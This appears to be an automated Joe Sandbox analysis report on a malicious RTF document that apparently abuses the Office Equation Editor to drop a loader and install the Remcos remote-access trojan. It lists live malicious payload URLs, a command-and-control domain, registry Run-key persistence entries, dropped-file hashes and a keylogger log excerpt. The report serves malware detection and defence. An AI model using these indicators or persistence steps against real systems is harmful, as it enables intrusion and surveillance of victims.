                        http://b.scorecardresearch.com/beacon.js | 0% | Avira URL Cloud | safe |
                        https://support.google.comH | 0% | Avira URL Cloud | safe |
                        http://103.198.26.173/360/HJC.exej | 0% | Avira URL Cloud | safe |
                        http://cache.btrll.com/default/Pix-1x1.gif | 0% | Avira URL Cloud | safe |
                        http://103.198.26.173/360/HJC.exehhC: | 0% | Avira URL Cloud | safe |
                        http://geoplugin.net/json.gpg | 0% | Avira URL Cloud | safe |
                        uckdns.org | 0% | Avira URL Cloud | safe |
                        https://www.adobe.c | 0% | Avira URL Cloud | safe |
                        https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au | 0% | Avira URL Cloud | safe |

                        Name | IP | Active | Malicious | Antivirus Detection | Reputation
                        dual-spov-0006.spov-msedge.net | 13.107.137.11 | true | false | | unknown
                        kenoss.duckdns.org | 103.186.117.100 | true | true | | unknown
                        geoplugin.net | 178.237.33.50 | true | false | | unknown
                        oqgpra.db.files.1drv.com | unknown | unknown | false | | high
                        onedrive.live.com | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://103.198.26.173/360/HJC.exe | true | Avira URL Cloud: safe | unknown
uckdns.org | true | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp | true | URL Reputation: phishing | unknown
https://onedrive.live.com/download?resid=FDB0512DE793B32E%21191&authkey=!ANO4kMGOfcJo8rs | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                                                  high
                                                                                                                                                  http://www.pmail.comhjc.exe, hjc.exe, 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.374068622.0000000003130000.00000004.00001000.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.396383723.0000000002FD0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://policies.yahoo.com/w3c/p3p.xmlbhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drfalse
                                                                                                                                                      high
                                                                                                                                                      http://crl.entrust.net/2048ca.crl0hjc.exe, 00000005.00000003.369181364.00000000002D4000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000009.00000002.845486984.000000000071F000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000011.00000002.431190937.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000017.00000002.464677307.00000000002CF000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000019.00000002.493552957.0000000000695000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://ocsp.sectigo.com0Chjc.exe, 00000005.00000003.369004868.000000007E560000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.376031931.00000000145E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.379695634.000000007E2E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.368787368.000000007DD50000.00000004.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.399328238.00000000145DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        http://www.msn.com/advertisement.ad.jsbhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://support.google.com/chrome/?p=phremcos.exe, 00000014.00000003.427677327.0000000002095000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://www.ebuddy.comremcos.exe, 00000010.00000002.401505696.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://oqgpra.db.files.1drv.com/y4mio8rSS_2jC5-0VIhrGMPPnTg6gYb3Bxmu9ktmO2sVy1Vu5NgT_hEOa73bPesLFGHremcos.exe, 00000009.00000002.845486984.000000000071F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                              • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
103.186.117.100 | kenoss.duckdns.org | unknown | 7575 | AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | true
13.107.137.11 | dual-spov-0006.spov-msedge.net | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
103.198.26.173 | unknown | unknown | 38809 | NXGNET-AS-APNextgenNetworksAU | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1430800
Start date and time: 2024-04-24 07:41:06 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 34s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 27
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: OKhCyJ619J.rtf (renamed because original name is a hash value)
Original Sample Name: 956ae61939b3dc9f9bbaed850423740b.rtf
Detection: MAL
Classification: mal100.phis.troj.spyw.expl.evad.winRTF@29/24@30/4
                                                                                                                                                              EGA Information:
                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                              HCA Information:
                                                                                                                                                              • Successful, ratio: 94%
                                                                                                                                                              • Number of executed functions: 81
                                                                                                                                                              • Number of non-executed functions: 135
                                                                                                                                                              Cookbook Comments:
                                                                                                                                                              • Found application associated with file extension: .rtf
                                                                                                                                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                              • Attach to Office via COM
                                                                                                                                                              • Active ActiveX Object
                                                                                                                                                              • Scroll down
                                                                                                                                                              • Close Viewer
                                                                                                                                                              • Override analysis time to 64723.2501969976 for current running targets taking high CPU consumption
                                                                                                                                                              • Override analysis time to 129446.500393995 for current running targets taking high CPU consumption
                                                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 13.107.42.12
                                                                                                                                                              • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, l-0003.l-msedge.net, odc-web-geo.onedrive.akadns.net, db-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, odc-db-files-geo.onedrive.akadns.net, odc-db-files-brs.onedrive.akadns.net
                                                                                                                                                              • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                              • VT rate limit hit for: OKhCyJ619J.rtf
Time | Type | Description
07:41:51 | API Interceptor | 339x Sleep call for process: EQNEDT32.EXE modified
07:42:00 | API Interceptor | 68x Sleep call for process: hjc.exe modified
07:42:08 | API Interceptor | 3511954x Sleep call for process: remcos.exe modified
07:42:18 | API Interceptor | 6x Sleep call for process: Rdxcjsng.PIF modified
22:42:08 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Rdxcjsng C:\Users\Public\Rdxcjsng.url
22:42:17 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Rmc-L24XL1 "C:\ProgramData\Remcos\remcos.exe"
22:42:28 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Rmc-L24XL1 "C:\ProgramData\Remcos\remcos.exe"
22:42:37 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Rdxcjsng C:\Users\Public\Rdxcjsng.url
22:42:50 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Rmc-L24XL1 "C:\ProgramData\Remcos\remcos.exe"
                                                                                                                                                              • 178.237.33.50
                                                                                                                                                              #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                              • 178.237.33.50
                                                                                                                                                              HFiHWvPsvA.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                              • 178.237.33.50
                                                                                                                                                              TcnD64eVFK.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                              • 178.237.33.50
                                                                                                                                                              DHL Express Courier Pickup Confirmation CBJ231025122456.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                              • 178.237.33.50
                                                                                                                                                              Quotation.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                              • 178.237.33.50
                                                                                                                                                              BRUFEN ORDER VAC442_7467247728478134247.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                              • 178.237.33.50
                                                                                                                                                              copy_76499Kxls.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                              • 178.237.33.50
                                                                                                                                                              payment swift.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                              • 178.237.33.50
Process: C:\Users\user\AppData\Roaming\hjc.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1639424
Entropy (8bit): 7.422823450789437
Encrypted: false
SSDEEP: 24576:7MkT4gLKu9KKozJQd/HJNRO/BNM6wIJp4m+3bu8U2flxAv:QkTpT9K1mzyNM6wW4mEQ2W
MD5: 46AE1DD2F5A1756EC2166E365971254D
SHA1: 0616B410CC32A9C0C6915B96C44D5C5923CB0F2F
SHA-256: 9B751EE322369D92E06044F37716C5066AE3E10C08CA70E0D8A489ACC24888BB
SHA-512: 617145481218AEBE78CED75205763DB5874D766EBD70AA9C854826DCD2353F5B179E847E858FF169C8503675F7297C477BA99141C6CACB6ABFF8CD40FE6834FA
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 71%
Reputation: low
                                                                                                                                                                                  Process:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1170
                                                                                                                                                                                  Entropy (8bit):3.503992165114182
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:6lQoecFb5SpEde5OyZWFe5fymydIMDce5uyLe5BWUykgWtN25MMykykgM:6OlcpYEiOUWqfV2IM1upBWUJht/MykJJ
                                                                                                                                                                                  MD5:EDD9D40DD572E28A5C40835F7D091BD7
                                                                                                                                                                                  SHA1:1889F194AF5188E474905B2F19B136B8A6D53585
                                                                                                                                                                                  SHA-256:E068D4180AE039C70FFC2D070B5443DD4530C612D164B7DB324A8361B234B4FF
                                                                                                                                                                                  SHA-512:F5AA6FC539CE8FE0AF7F2EAE8C16CBFE2AD90155C431AD8FC031370DD92E205DA6E94A6B9ED2A1DE4FBB4557FC522B0C32F998C8705E5D4242F838E5A7840369
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\fggrt\logs.dat, Author: Joe Security
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Preview:....[.2.0.2.4./.0.4./.2.4. .0.7.:.4.2.:.1.4. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.R.e.m.c.o.s.\.r.e.m.c.o.s...e.x.e.].....[.W.i.n.].r.....[.R.u.n.].........[.O.K.h.C.y.J.6.1.9.J. .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.]. .-. .M.i.c.r.o.s.o.f.t. .W.o.r.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.O.K.h.C.y.J.6.1.9.J. .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.]. .-. .M.i.c.r.o.s.o.f.t. .W.o.r.d.].........[.O.K.h.C.y.J.6.1.9.J. .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.]. .-. .M.i.c.r.o.s.o.f.t. .W.o.r.d. .(.N.o.t. .R.e.s.p.o.n.d.i.n.g.).].....[.W.i.n.].r.....[.R.u.n.].........[.i.m.g.s. .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.]. .-. .M.i.c.r.o.s.o.f.t. .W.o.r.d.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.i.m.g.s. .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.]. .-. .M.i.c.r.o.s.o.f.t. .W.o.r.d.].........[.M.i.c.r.o.s.o.f.t. .W.o.r.d.].........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .
                                                                                                                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1639424
                                                                                                                                                                                  Entropy (8bit):7.422823450789437
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24576:7MkT4gLKu9KKozJQd/HJNRO/BNM6wIJp4m+3bu8U2flxAv:QkTpT9K1mzyNM6wW4mEQ2W
                                                                                                                                                                                  MD5:46AE1DD2F5A1756EC2166E365971254D
                                                                                                                                                                                  SHA1:0616B410CC32A9C0C6915B96C44D5C5923CB0F2F
                                                                                                                                                                                  SHA-256:9B751EE322369D92E06044F37716C5066AE3E10C08CA70E0D8A489ACC24888BB
                                                                                                                                                                                  SHA-512:617145481218AEBE78CED75205763DB5874D766EBD70AA9C854826DCD2353F5B179E847E858FF169C8503675F7297C477BA99141C6CACB6ABFF8CD40FE6834FA
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Process:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):965
                                                                                                                                                                                  Entropy (8bit):5.004832253615082
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:tkbOnd6CsGkMyGWKyGXPVGArwY3o/IomaoHNmGNArpv/mOAaNO+ao9W7iN5zzkwn:qbCdRNuKyGX85jrvXhNlT3/7sYDsro
                                                                                                                                                                                  MD5:C73B159871D7780F018E99406AD5AF76
                                                                                                                                                                                  SHA1:5270DB444A46AB3CBAE1753308FED10CAFDD6F80
                                                                                                                                                                                  SHA-256:453DB0468A2C6F5EEDC35565E202913D388A52D300BDF82C8995EFA4BCC9BECA
                                                                                                                                                                                  SHA-512:BEC715180705256A692978960027E09476D42001D7BDD7E4B8EAF6B4074DD484FA143E7629BCF80A825745A24978BF97E82AB7A143AC4BD54E7CA01DE4117D7C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Preview:{. "geoplugin_request":"154.16.105.36",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Las Vegas",. "geoplugin_region":"Nevada",. "geoplugin_regionCode":"NV",. "geoplugin_regionName":"Nevada",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"839",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"36.1685",. "geoplugin_longitude":"-115.1164",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Los_Angeles",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):16384
                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                  MD5:CE338FE6899778AACFC28414F2D9498B
                                                                                                                                                                                  SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                                                                                                                                                                                  SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                                                                                                                                                                                  SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):14848
                                                                                                                                                                                  Entropy (8bit):3.6155471059584294
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:xDokOaZAMEQ94ha+X7wwPeDH9wUorClneiNJExTz7C2l:bLZAMEA+X7/WdS0fJoTzl
                                                                                                                                                                                  MD5:88386CD9E713B7AE92C1A9F762478255
                                                                                                                                                                                  SHA1:7460E9E86FC8A46D9A1C2D0362558400E3C73A44
                                                                                                                                                                                  SHA-256:56979C88620DC782A116EE26CFA0FDA66D3BDD8295FCC32410CBD23194E3C7AD
                                                                                                                                                                                  SHA-512:6D02C26DC769E80E21D06C2E5BC545200015B2EE95443F1703624687558019B6E24E14CA9422831CB1949E29AF92A95479C8CC3DA4ED7BC10CA0170F78A7E7DA
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1024
                                                                                                                                                                                  Entropy (8bit):0.05390218305374581
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                                                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                                                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                                                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                                                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x0da30b1b, page size 32768, DirtyShutdown, Windows version 6.1
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):21037056
                                                                                                                                                                                  Entropy (8bit):1.1395879474792583
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24576:XO1U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:XOEXs1LuHqqEXwPW+RHA6m1fN
                                                                                                                                                                                  MD5:B2A18BAED47719EA41AF3EC88421D208
                                                                                                                                                                                  SHA1:2B12015B3DAD3467CE2DE6FEA50C208167D18259
                                                                                                                                                                                  SHA-256:2263BC7DC3BB0619C9DCCC528D81E89FA4A0C01B9B43D7A581B3831CDE18D599
                                                                                                                                                                                  SHA-512:AB60181AF0884024D8C0B9D75AF461FD8DB79F54EDAD5FC616D53DB9036F93ABC88BFF2DA145ED2B20B0B4596B5048D44E5BFEF5912C60E8D921AF389B43021E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x0da30b1b, page size 32768, DirtyShutdown, Windows version 6.1
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):21037056
                                                                                                                                                                                  Entropy (8bit):1.1390581873112275
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24576:FO1U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:FOEXs1LuHqqEXwPW+RHA6m1fN
                                                                                                                                                                                  MD5:F73576E0773FD7C04D69E507DCE84DEE
                                                                                                                                                                                  SHA1:577EC1A8B8255C385B598A09204D4D09059A3A95
                                                                                                                                                                                  SHA-256:7EB819F68E81F1DC08AA45B76D704570D4FED62890E3E8937863C6E0F0B18E73
                                                                                                                                                                                  SHA-512:C50A1AB24E629D68A86782C7FA0E1AE1D8FC3A35BA1CE35E4BE75C2191D21F462752D92B68035F2A65B542187779E910AC5F0AD2AECD505AD06E9ABBBD44D2C6
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Qn:Qn
                                                                                                                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:..
                                                                                                                                                                                  Process:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Qn:Qn
                                                                                                                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:..
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:03 2023, mtime=Fri Aug 11 15:42:03 2023, atime=Wed Apr 24 04:41:49 2024, length=65610, window=hide
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1014
                                                                                                                                                                                  Entropy (8bit):4.517726684212363
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:8JxtXsFgXg/XAlCPCHaX6zBJLYgB/J89rX+WqblV6wJlNQOicvbJ48eDtZ3YilMH:8J7Y/XTqzDsgc9mEteJeDv3qmk7N
                                                                                                                                                                                  MD5:645CBF050467E2BF17E098A54345AAD6
                                                                                                                                                                                  SHA1:C3B6234E5FCB50ABBDFD4470057373C966249DC7
                                                                                                                                                                                  SHA-256:D48AB989FF7C61E1CEBA087E3F2AAF48C686584CA0488AAA34404026C0CE3069
                                                                                                                                                                                  SHA-512:74660E3416A4C744B0D422F441B264439C561E6BD876D9253BD74648073C9FD4C3A0739363C2B2C34E4C2D51F97DD20169A4F391B33BCC82D925B9E246FB41A1
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:L..................F.... .......r.......r...k.g.....J............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......X7-..user.8......QK.X.X7-*...&=....U...............A.l.b.u.s.....z.1......WC...Desktop.d......QK.X.WC.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2.J....X9- .OKHCYJ~1.RTF..J.......WB..WB.*.........................O.K.h.C.y.J.6.1.9.J...r.t.f.......x...............-...8...[............?J......C:\Users\..#...................\\258555\Users.user\Desktop\OKhCyJ619J.rtf.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.O.K.h.C.y.J.6.1.9.J...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......258555..........D_....3N...W...9.W.e8...8.....[D_....3N...W...9.W.e8
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                  File Type:Generic INItialization configuration [folders]
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):55
                                                                                                                                                                                  Entropy (8bit):4.65408698625193
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:HhuxXCm4vTXCv:HhCIc
                                                                                                                                                                                  MD5:FD6867AAC40E4DA458E6757A6EDE3C15
                                                                                                                                                                                  SHA1:6F23A4A87E0EFA3758541FF7F5616EC2CC8C2BF6
                                                                                                                                                                                  SHA-256:AC63475BA516DDC4DD3834DE0F0BC743AE731C76DA068FB3A7FE114F60A56071
                                                                                                                                                                                  SHA-512:904E7373215201D657D59EE58BA4E12E37B874905F86414D96C8F110A102734BFEC0F55B2FF26F226EC6343647F59B928CE3FB49E8BA92E8C13651B3FD4E3C2C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:[misc]..OKhCyJ619J.LNK=0..[folders]..OKhCyJ619J.LNK=0..
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):162
                                                                                                                                                                                  Entropy (8bit):2.4797606462020307
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:vrJlaCkWtVyxblgl0nGltlMWtVGXlcNOllln:vdsCkWtMe2G/LkXh/l
                                                                                                                                                                                  MD5:89AFCB26CA4D4A770472A95DF4A52BA8
                                                                                                                                                                                  SHA1:C3B3FEAEF38C3071AC81BC6A32242E6C39BEE9B5
                                                                                                                                                                                  SHA-256:EF0F4A287E5375B5BFFAE39536E50FDAE97CD185C0F7892C7D25BD733E7D2F17
                                                                                                                                                                                  SHA-512:EA44D55E57AEFA8D6F586F144CB982145384F681D0391C5AD8E616A67D77913152DB7B0F927E57CDA3D1ECEC3D343A1D6E060EAFF8E8FEDBE38394DFED8224CC
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                                                                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1639424
                                                                                                                                                                                  Entropy (8bit):7.422823450789437
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24576:7MkT4gLKu9KKozJQd/HJNRO/BNM6wIJp4m+3bu8U2flxAv:QkTpT9K1mzyNM6wW4mEQ2W
                                                                                                                                                                                  MD5:46AE1DD2F5A1756EC2166E365971254D
                                                                                                                                                                                  SHA1:0616B410CC32A9C0C6915B96C44D5C5923CB0F2F
                                                                                                                                                                                  SHA-256:9B751EE322369D92E06044F37716C5066AE3E10C08CA70E0D8A489ACC24888BB
